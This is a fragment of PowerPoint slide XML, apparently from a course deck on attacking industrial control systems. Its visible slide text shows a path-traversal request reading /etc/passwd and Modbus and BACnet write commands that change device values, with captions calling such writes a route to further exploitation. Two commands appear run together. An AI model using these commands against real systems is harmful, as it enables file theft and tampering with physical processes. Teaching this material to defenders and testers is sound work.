                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>curl "http://192.168.0.10/config?file=../../etc/passwd"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587734" y="6245900"/>
            <a:ext cx="6290191" cy="34742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151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SQL/command injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587734" y="6669286"/>
            <a:ext cx="6290191" cy="347424"/>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151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>etc</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15077" y="486132"/>
            <a:ext cx="6753106" cy="549116"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="4300"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>2d. Explore Protocol Services:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="615077" y="1386721"/>
            <a:ext cx="3847028" cy="579834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="4550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4550" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Port 502</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1440180" y="2186226"/>
            <a:ext cx="2196703" cy="274558"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">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Modbus:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="615077" y="2658428"/>
            <a:ext cx="3847028" cy="544711"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1679"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606385" y="2658428"/>
            <a:ext cx="3864412" cy="544711"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4839"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="782122" y="2790230"/>
            <a:ext cx="3512939" cy="281107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>modbus-cli write -a 1 -r 40001 -v 90</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="615077" y="3400782"/>
            <a:ext cx="3847028" cy="1124426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"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 Command above attempts to write a value to a specific Modbus register. If successful this can be further exploited to write malicious things into the register</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681776" y="1386721"/>
            <a:ext cx="3847148" cy="579834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="4550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4550" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Port 47808</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5506998" y="2186226"/>
            <a:ext cx="2196703" cy="274558"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2150"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>BACnet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681776" y="2658428"/>
            <a:ext cx="3847148" cy="1106924"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 826"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4673084" y="2658428"/>
            <a:ext cx="3864531" cy="1106924"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2381"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4848820" y="2790230"/>
            <a:ext cx="3513058" cy="843320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>bvlc_client -i 192.168.0.10bacwrite -i 192.168.0.10 -p 47808 -o 1 -v 110</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681776" y="3962995"/>
            <a:ext cx="3847148" cy="1132046"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"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 Command 1 initiates a connection to the BACnet device at </a:t>
            </a:r>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>192.168.0.10</a:t>
            </a:r>
            <a:pPr algn="ctr"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 for further interaction, such as discovering services or reading/writing properties.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681776" y="5200412"/>
            <a:ext cx="3847148" cy="1436013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"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Command 2 s using the </a:t>
            </a:r>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>bacwrite</a:t>
            </a:r>
            <a:pPr algn="ctr"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 tool to write a value to a BACnet object. Attempts to the value </a:t>
            </a:r>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>110</a:t>
            </a:r>
            <a:pPr algn="ctr"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 to object </a:t>
            </a:r>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:pPr algn="ctr"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 on the BACnet device located at IP </a:t>
            </a:r>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>192.168.0.10</a:t>
            </a:r>
            <a:pPr algn="ctr"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 on port </a:t>
            </a:r>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>47808</a:t>
            </a:r>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2648426" y="7075765"/>
            <a:ext cx="3847028" cy="579834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="4550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4550" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2648426" y="7743468"/>
            <a:ext cx="3847028" cy="281107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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2985254" y="2908340"/>
            <a:ext cx="8659773" cy="978218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="7700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Step 3 – Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4340185"/>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
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4958239"/>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17</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2025-10-03T20:00:57Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-03T20:00:57Z</dcterms:modified>
</cp:coreProperties>
</file>